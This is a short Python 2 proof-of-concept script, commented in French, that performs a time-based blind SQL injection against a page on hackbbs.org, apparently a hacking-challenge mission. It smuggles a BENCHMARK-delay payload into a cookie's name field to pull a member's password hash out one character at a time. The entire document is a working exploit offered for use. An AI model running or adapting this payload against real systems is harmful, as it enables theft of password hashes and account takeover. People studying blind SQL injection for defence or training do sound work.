#! /usr/bin/env python

import httplib
import time
import sys

### Time Based SQLI
### PoC de recuperation des Hashs des pass membre
### Author : Onemore
### Injection dans champ NAME
### Usage ./Time_Based_sqli_miss15.py Username
#declaration charset
charset = ['0','9','8','7','6','5','4','3','2','1','a','b','c','d','e','f']

nom = sys.argv[1][::-1].upper()
res = ''

for i in range(1,33):
    for char in range(len(charset)):
        time.sleep(10)
        conn = httplib.HTTPConnection("hackbbs.org")
        
        cook = {"Cookie" : "PHPSESSID=xxxxxxxxxxx; name=EROMENO',(if((SELECT ORD(SUBSTRING(pass,"+str(i)+",1)) FROM membre WHERE name LIKE '%"+nom+"%')="+str(ord(charset[char]))+",BENCHMARK(25000000,ENCODE('MSG','by 5 seconds')),'1337')),1393697800)#"}

        conn.request("GET", "/miss/15/gene.php", headers=cook)
        time_deb = int(time.time())
        reponse = conn.getresponse()
        webpage = reponse.read()
        time_exec = int(time.time())-time_deb
        if time_exec > 3:
            res += charset[char]
            print 'Hash en cours....', res
            break


print "User : ",nom[::-1]
print "Hash : ",res


